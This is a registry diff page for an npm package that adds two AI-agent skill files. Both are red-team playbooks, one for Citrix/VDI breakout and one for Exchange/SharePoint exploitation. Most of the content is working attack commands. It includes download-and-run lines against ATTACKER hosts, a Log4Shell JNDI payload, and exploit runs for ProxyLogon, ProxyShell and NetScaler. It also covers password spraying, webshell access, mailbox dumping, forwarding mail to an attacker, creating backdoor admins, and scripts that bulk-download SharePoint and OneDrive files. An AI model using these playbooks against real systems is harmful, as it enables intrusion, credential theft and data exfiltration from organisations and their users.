npm - rtexit-method - Versions diffs - 0.1.5 → 0.1.7 - Mend

rtexit-method 0.1.5 → 0.1.7

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (12) hide show

package/packaged-assets/.agents/skills/rt-citrix-vdi/SKILL.md ADDED Viewed

@@ -0,0 +1,249 @@
+---
+name: rt-citrix-vdi
+description: "Citrix and VDI breakout skill for authorized engagements. Citrix receiver dialog box escape, file manager breakout, print dialog abuse, URL handler exploitation, Citrix StoreFront enumeration, Citrix ADC (NetScaler) exploitation, VMware Horizon breakout, RDS/RemoteApp escape, and pivoting from VDI to internal network. Use when engagement scope includes Citrix published applications, VDI environments, or thin client deployments."
+---
+# rt-citrix-vdi — Citrix & VDI Breakout
+## Overview
+Citrix and VDI environments are designed to give users access to applications without full desktop access. Breakout techniques find gaps in application whitelisting that allow launching unauthorized processes, accessing the underlying OS, or pivoting to the internal network.
+---
+## Phase 1 — Citrix Enumeration
+```bash
+# Find Citrix infrastructure
+nmap -sV -p 443,8080,1494,2598,80 TARGET_RANGE
+# 1494 = Citrix ICA protocol
+# 2598 = Citrix CGP (session reliability)
+# 443 = Citrix Gateway / StoreFront (HTTPS)
+# Enumerate StoreFront (web interface)
+curl https://citrix.corp.com/Citrix/StoreWeb/
+# Look for: published application list, authentication methods
+# Check for NetScaler (Citrix ADC)
+curl -I https://citrix.corp.com/
+# X-Citrix-Application header = NetScaler
+# CVE-2019-19781 (NetScaler RCE — still found in old installs)
+curl -v "https://NETSCALER_IP/vpn/../vpns/cfg/smb.conf"
+# If returns config file → vulnerable
+# Exploit CVE-2019-19781
+python3 citrix_rce.py --host NETSCALER_IP --cmd "id"
+# github.com/trustedsec/cve-2019-19781
+```
+---
+## Phase 2 — Published Application Breakout
+### Dialog Box Techniques
+```
+TECHNIQUE 1: File Open/Save Dialog → Explorer
+- In published app: File → Open OR File → Save As
+- Dialog box opens → navigate to C:\Windows\System32\
+- Type in filename field: cmd.exe → press Enter → cmd.exe launches
+TECHNIQUE 2: Print Dialog → Run
+- File → Print → Print to PDF → Browse
+- In save dialog → address bar type: \\ATTACKER_IP\share
+  (triggers SMB auth) OR type C:\Windows\System32\cmd.exe
+TECHNIQUE 3: About Box → Help → Browser
+- Help → About → click hyperlink in about box
+- Default browser opens (Internet Explorer often)
+- IE address bar: C:\Windows\System32\cmd.exe
+```
+### Sticky Keys / Accessibility Breakout
+```powershell
+# If you can reach the lock screen or accessibility menu:
+# Press Shift 5 times → Sticky Keys dialog
+# Click "Go to Ease of Access Center" → opens IE/Edge
+# Address bar → cmd.exe
+# Task Manager breakout (if Ctrl+Alt+Del available)
+# Ctrl+Alt+Del → Task Manager → File → Run New Task
+# Type: cmd.exe ✓ → shell
+```
+### URL Handler Abuse
+```
+# In browser within published app (if available):
+# Address bar tricks:
+file:///C:/Windows/System32/cmd.exe
+\\ATTACKER_IP\share   (triggers file dialog)
+# If Office is published:
+# Insert → Hyperlink → type: cmd.exe → click link → spawns cmd
+# PowerPoint: Insert → Action → Run Program → cmd.exe
+```
+---
+## Phase 3 — Escape from Restricted Shell / AppLocker
+```powershell
+# Once in cmd.exe — likely AppLocker restricted
+# Can't run .exe from Downloads → use trusted paths
+# LOLBAS from trusted locations (AppLocker usually allows System32)
+C:\Windows\System32\mshta.exe http://ATTACKER/payload.hta
+C:\Windows\System32\wscript.exe \\ATTACKER\share\payload.vbs
+C:\Windows\System32\certutil.exe -urlcache -split -f http://ATTACKER/nc.exe C:\Temp\nc.exe
+# PowerShell (if not blocked)
+powershell -ExecutionPolicy Bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER/shell.ps1')"
+# MSBuild (AppLocker bypass — trusted Microsoft binary)
+C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe payload.csproj
+# InstallUtil
+C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false payload.dll
+# Regsvr32 (squiblydoo)
+regsvr32 /s /n /u /i:http://ATTACKER/payload.sct scrobj.dll
+```
+---
+## Phase 4 — Citrix-Specific Privilege Escalation
+```powershell
+# Check which user account runs published apps
+whoami
+# Often: domain user or service account
+# Check Citrix session info
+qwinsta  # List sessions
+query session  # Active sessions
+# Find other users' sessions on same Citrix server
+query user /server:CITRIX_SERVER
+# Session hijacking (if admin)
+tscon TARGET_SESSION_ID /dest:CURRENT_SESSION_ID /password:""
+# Takes over another user's session
+# Check for sensitive data in Citrix profile
+# Citrix redirects: Desktop, Documents, Downloads to UNC paths
+net use  # See mapped drives
+# Often: H:\ = home drive, G:\ = group share → company data
+# Keylogging other users' sessions (SYSTEM required)
+# Use existing C2 capabilities once SYSTEM is obtained
+```
+---
+## Phase 5 — VMware Horizon Breakout
+```bash
+# VMware Horizon (VDI platform — alternative to Citrix)
+# Similar breakout techniques apply
+# Horizon enumeration
+nmap -sV -p 443,8443,4172,32111 HORIZON_SERVER
+# 4172 = PCoIP protocol
+# 443 = Horizon Connection Server web interface
+# CVE-2021-22005 (Horizon SSRF/RCE — Log4Shell related)
+curl -X POST "https://HORIZON_IP/logon" \
+  -H "X-Forwarded-For: \${jndi:ldap://ATTACKER_IP/exploit}"
+# Horizon client breakout
+# Same dialog box techniques as Citrix apply
+# VMware Tools on guest → check for shared folders
+net share  # List shared resources
+# vmware-tools may expose host filesystem
+# Remote Desktop Session Host (RDSH) breakout
+# Similar to Citrix — look for:
+# Task Manager → File → Run
+# Explorer via dialog boxes
+# Accessibility tools at lock screen
+```
+---
+## Phase 6 — Pivot from VDI to Internal Network
+```powershell
+# VDI machine is domain-joined → standard AD attacks apply
+# From VDI shell:
+# Network discovery (VDI has internal network access)
+ipconfig /all  # Check all interfaces
+arp -a         # Internal hosts
+# Port scan internal from VDI (often unrestricted internally)
+# PowerShell port scan (no nmap needed)
+1..1024 | ForEach-Object {
+    $socket = New-Object Net.Sockets.TcpClient
+    $connect = $socket.BeginConnect("10.10.10.1", $_, $null, $null)
+    Start-Sleep -Milliseconds 50
+    if ($socket.Connected) { Write-Host "OPEN: $_" }
+    $socket.Close()
+}
+# Credential hunting on VDI
+# Users store passwords in browser, sticky notes, files
+Get-ChildItem C:\Users -Recurse -Include "*.txt","*.xlsx","*.docx","password*","creds*" 2>$null
+# Browser saved passwords
+.\SharpChrome.exe logins
+# SMB lateral movement from VDI to internal servers
+crackmapexec smb 10.10.10.0/24 -u user -p password
+```
+---
+## Phase 7 — Citrix ADC (NetScaler) Exploitation
+```bash
+# NetScaler = Citrix load balancer / gateway — high value target
+# CVE-2023-3519 (Unauthenticated RCE — critical, 2023)
+# Affects: NetScaler ADC and Gateway before specific versions
+curl -v "https://NETSCALER_IP/gwtest/formssso?event=start&target=http://ATTACKER:8080/$(python3 -c 'print(\"A\"*1024)')"
+# Password spray against NetScaler Gateway
+# Often exposed to internet → spray corporate credentials
+hydra -L users.txt -p 'Summer2024!' TARGET_IP https-post-form \
+  "/nf/auth/doAuthentication.do:login=^USER^&passwd=^PASS^&StateContext=:Password:"
+# Extract NetScaler config (if admin access)
+# Contains: LDAP service account creds, VPN config, SSL certs
+show ns config  # NetScaler CLI
+cat /nsconfig/ns.conf  # Config file (has passwords in cleartext sometimes)
+```
+---
+## Skill Levels
+**BEGINNER:** Dialog box breakout to cmd.exe · File Open/Save escape · Task Manager run
+**INTERMEDIATE:** AppLocker bypass via LOLBAS · VDI network discovery and pivoting · Browser credential extraction
+**ADVANCED:** Session hijacking · NetScaler CVE exploitation · VMware Horizon RCE
+**EXPERT:** Citrix ADC full compromise · Custom AppLocker bypass chains · VDI persistence via COM hijacking
+---
+## References
+- CVE-2019-19781: https://github.com/trustedsec/cve-2019-19781
+- CVE-2023-3519: https://www.rapid7.com/blog/post/2023/07/18/etr-cve-2023-3519/
+- Citrix breakout techniques: https://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-environments/
+- MITRE T1548: https://attack.mitre.org/techniques/T1548/

package/packaged-assets/.agents/skills/rt-exchange-sharepoint/SKILL.md ADDED Viewed

@@ -0,0 +1,256 @@
+---
+name: rt-exchange-sharepoint
+description: "Microsoft Exchange and SharePoint exploitation skill for authorized engagements. Exchange Server privilege escalation (CVE-2021-26855 ProxyLogon, ProxyShell), OWA credential harvesting, Exchange SSRF chains, PowerShell Exchange abuse for email access, SharePoint SSRF and RCE, SharePoint sensitive data discovery, OneDrive enumeration via Graph API, and post-compromise email/file access. Use when Exchange or SharePoint servers are in scope."
+---
+# rt-exchange-sharepoint — Exchange & SharePoint Exploitation
+## Overview
+Exchange and SharePoint servers are high-value targets — they hold email, files, and often have privileged service accounts. On-premises Exchange has had critical RCE/SSRF vulnerabilities (ProxyLogon, ProxyShell) and SharePoint has frequent SSRF and deserialization issues.
+---
+## Phase 1 — Discovery & Enumeration
+```bash
+# Find Exchange servers
+nmap -sV -p 25,443,587,993,995,8443 TARGET_RANGE
+# 25 = SMTP, 443 = OWA/ECP/EWS/ActiveSync
+# Exchange version fingerprinting
+curl -s -k -I "https://EXCHANGE_IP/owa/" | grep -i "X-OWA-Version\|Server"
+# Check exposed endpoints
+for endpoint in "/owa/" "/ecp/" "/ews/" "/autodiscover/" "/mapi/" "/oab/" "/rpc/" "/Microsoft-Server-ActiveSync"; do
+    code=$(curl -k -s -o /dev/null -w "%{http_code}" "https://EXCHANGE_IP$endpoint")
+    echo "$code $endpoint"
+done
+# Find SharePoint
+nmap -sV -p 80,443,8080 TARGET_RANGE
+curl -k -I "https://SHAREPOINT_IP/_layouts/15/start.aspx#/"
+# X-SharePointHealthScore header = SharePoint
+# SharePoint version
+curl -k "https://SHAREPOINT_IP/_vti_pvt/service.cnf"
+curl -k "https://SHAREPOINT_IP/_vti_bin/sites.asmx"
+```
+---
+## Phase 2 — ProxyLogon (CVE-2021-26855) — Exchange RCE
+```bash
+# ProxyLogon: SSRF → authentication bypass → RCE
+# Affects: Exchange 2013/2016/2019 before March 2021 patches
+# Still found in environments that haven't patched
+# Check vulnerability
+curl -k -s "https://EXCHANGE_IP/ecp/y.js" \
+  -H "Cookie: X-BEResource=localhost~1942062522" | head -5
+# "function" in response = PATCHED, error = VULNERABLE
+# Exploit with publicly available PoC
+git clone https://github.com/hausec/ProxyLogon
+python3 proxylogon.py -t EXCHANGE_IP -e attacker@corp.com
+# Drops webshell at: https://EXCHANGE_IP/owa/auth/shell.aspx
+# Access webshell
+curl -k "https://EXCHANGE_IP/owa/auth/shell.aspx?cmd=whoami"
+# Output: NT AUTHORITY\SYSTEM
+```
+---
+## Phase 3 — ProxyShell (CVE-2021-34473/34523/31207) — Exchange RCE
+```bash
+# ProxyShell: Three CVEs chained → unauthenticated RCE
+# Affects: Exchange 2013/2016/2019 before July 2021 patches
+# Check vulnerability
+curl -k "https://EXCHANGE_IP/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com"
+# 200 OK = potentially vulnerable
+# Exploit
+git clone https://github.com/dmaasland/proxyshell-poc
+pip3 install requests
+python3 proxyshell.py -u https://EXCHANGE_IP -e admin@corp.com
+# Or: Metasploit
+use exploit/windows/http/exchange_proxyshell_rce
+set RHOSTS EXCHANGE_IP
+set EMAIL admin@corp.com
+run
+# → SYSTEM shell on Exchange server
+```
+---
+## Phase 4 — Exchange Post-Compromise
+```powershell
+# After RCE or with Exchange admin credentials
+# Dump all mailboxes (Exchange admin PowerShell)
+Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn
+Get-Mailbox -ResultSize Unlimited | Export-Mailbox -DeliveryFormat EML -DeliveryPath C:\Temp\Mailboxes\
+# Search all mailboxes for keywords
+Search-Mailbox -SearchQuery "password OR credential OR secret" -SearchDumpsterOnly $false -ResultSize Unlimited -TargetMailbox "admin@corp.com" -TargetFolder "SearchResults"
+# Access specific user's mailbox (as Exchange admin)
+# Exchange Web Services (EWS)
+$cred = Get-Credential
+$exchangeUrl = "https://EXCHANGE_IP/EWS/Exchange.asmx"
+$service = New-Object Microsoft.Exchange.WebServices.Data.ExchangeService
+$service.Credentials = $cred
+$service.ImpersonatedUserId = New-Object Microsoft.Exchange.WebServices.Data.ImpersonatedUserId([Microsoft.Exchange.WebServices.Data.ConnectingIdType]::SmtpAddress, "victim@corp.com")
+$inbox = [Microsoft.Exchange.WebServices.Data.Folder]::Bind($service, [Microsoft.Exchange.WebServices.Data.WellKnownFolderName]::Inbox)
+$view = New-Object Microsoft.Exchange.WebServices.Data.ItemView(50)
+$inbox.FindItems($view) | Select-Object Subject, DateTimeReceived, From
+# Forward all incoming email (persistence)
+Set-Mailbox victim@corp.com -DeliverToMailboxAndForward $true -ForwardingSmtpAddress attacker@external.com
+# All future emails silently forwarded to attacker
+# Create new Exchange admin (persistence)
+New-Mailbox -Name "IT Support" -Alias "itsupport" -UserPrincipalName "itsupport@corp.com" -Password (ConvertTo-SecureString "Password1!" -AsPlainText -Force)
+Add-RoleGroupMember "Organization Management" -Member itsupport
+```
+---
+## Phase 5 — OWA Credential Harvesting
+```bash
+# OWA (Outlook Web Access) — often internet-facing
+# Password spray with domain credentials
+# Spray OWA
+python3 ruler.py --domain corp.com --users users.txt --password 'Summer2024!' spray --verbose
+# github.com/sensepost/ruler
+# Or with MailSniper
+Import-Module MailSniper.ps1
+Invoke-PasswordSprayOWA -ExchangeVersion Exchange2016 \
+  -ExchHostname mail.corp.com \
+  -UserList users.txt -Password 'Summer2024!'
+# OWA GAL (Global Address List) enumeration — find all email addresses
+Get-GlobalAddressList -AccessToken $token
+# Returns all internal email addresses — useful for targeting
+```
+---
+## Phase 6 — SharePoint Exploitation
+```bash
+# SharePoint SSRF (CVE-2019-0604 — old but still found)
+curl -k "https://SHAREPOINT_IP/_layouts/15/Picker.aspx" \
+  -d "__VIEWSTATE=&__EVENTVALIDATION=&__EVENTTARGET=&__EVENTARGUMENT=&ctl00%24PlaceHolderMain%24queryControl%24txtQuerySearch=&ctl00%24PlaceHolderMain%24btnSearch=Search"
+# CVE-2020-0932 SharePoint RCE (deserialization)
+# Requires low-priv authenticated user
+python3 sharepoint_rce.py --url https://SHAREPOINT_IP --user user@corp.com --password Password1
+# SharePoint sensitive file discovery
+# Search for password files, config files
+curl -k "https://SHAREPOINT_IP/sites/IT/_api/search/query?querytext='password+filetype:xlsx+OR+filetype:docx'" \
+  -H "Accept: application/json"
+# Download all files from SharePoint site
+# Using SharePoint REST API
+python3 << 'EOF'
+import requests
+base_url = "https://sharepoint.corp.com/sites/Internal"
+session = requests.Session()
+session.auth = ("user@corp.com", "Password1")
+# Get all files in root
+r = session.get(f"{base_url}/_api/web/GetFolderByServerRelativeUrl('/')/Files",
+                headers={"Accept": "application/json"})
+for file in r.json()['value']:
+    print(file['Name'], file['ServerRelativeUrl'])
+    # Download each file
+    content = session.get(f"{base_url}/_api/web/GetFileByServerRelativeUrl('{file['ServerRelativeUrl']}')/$value")
+    open(file['Name'], 'wb').write(content.content)
+EOF
+```
+---
+## Phase 7 — Microsoft Graph API (O365 SharePoint/OneDrive)
+```bash
+# After obtaining OAuth token (from device code phishing, consent grant, etc.)
+# Access all M365 data via Graph API
+# List all SharePoint sites
+curl "https://graph.microsoft.com/v1.0/sites?search=*" \
+  -H "Authorization: Bearer $TOKEN"
+# Search SharePoint for sensitive keywords
+curl "https://graph.microsoft.com/v1.0/search/query" \
+  -H "Authorization: Bearer $TOKEN" \
+  -H "Content-Type: application/json" \
+  -d '{
+    "requests": [{
+      "entityTypes": ["driveItem"],
+      "query": {"queryString": "password OR credentials OR secret"},
+      "fields": ["name","webUrl","lastModifiedDateTime"]
+    }]
+  }'
+# Download OneDrive files
+# Get user's OneDrive root
+curl "https://graph.microsoft.com/v1.0/users/victim@corp.com/drive/root/children" \
+  -H "Authorization: Bearer $TOKEN"
+# Download all files recursively
+python3 << 'EOF'
+import requests, os
+token = "ACCESS_TOKEN"
+headers = {"Authorization": f"Bearer {token}"}
+base = "https://graph.microsoft.com/v1.0"
+def download_folder(path, local_path):
+    r = requests.get(f"{base}{path}/children", headers=headers)
+    os.makedirs(local_path, exist_ok=True)
+    for item in r.json().get('value', []):
+        if 'folder' in item:
+            download_folder(f"/drives/{item['parentReference']['driveId']}/items/{item['id']}", f"{local_path}/{item['name']}")
+        else:
+            content = requests.get(item['@microsoft.graph.downloadUrl'])
+            open(f"{local_path}/{item['name']}", 'wb').write(content.content)
+            print(f"Downloaded: {item['name']}")
+download_folder("/users/victim@corp.com/drive/root", "./stolen_files")
+EOF
+```
+---
+## Skill Levels
+**BEGINNER:** OWA password spray · SharePoint sensitive file discovery · Graph API email access
+**INTERMEDIATE:** ProxyLogon/ProxyShell exploitation · EWS impersonation for mailbox access · SharePoint REST API enumeration
+**ADVANCED:** Email forwarding persistence · Full mailbox export · CVE chaining for unauthenticated RCE
+**EXPERT:** Exchange transport agent backdoor · SharePoint webpart backdoor · Hybrid Exchange → on-prem AD escalation
+---
+## References
+- ProxyLogon: https://proxylogon.com
+- ProxyShell: https://www.zerodayinitiative.com/blog/2021/8/17/from-pwn2own-2021-a-new-attack-surface-on-microsoft-exchange-proxyshell
+- Ruler (Exchange): https://github.com/sensepost/ruler
+- Graph API: https://docs.microsoft.com/en-us/graph/overview
+- MITRE T1114: https://attack.mitre.org/techniques/T1114/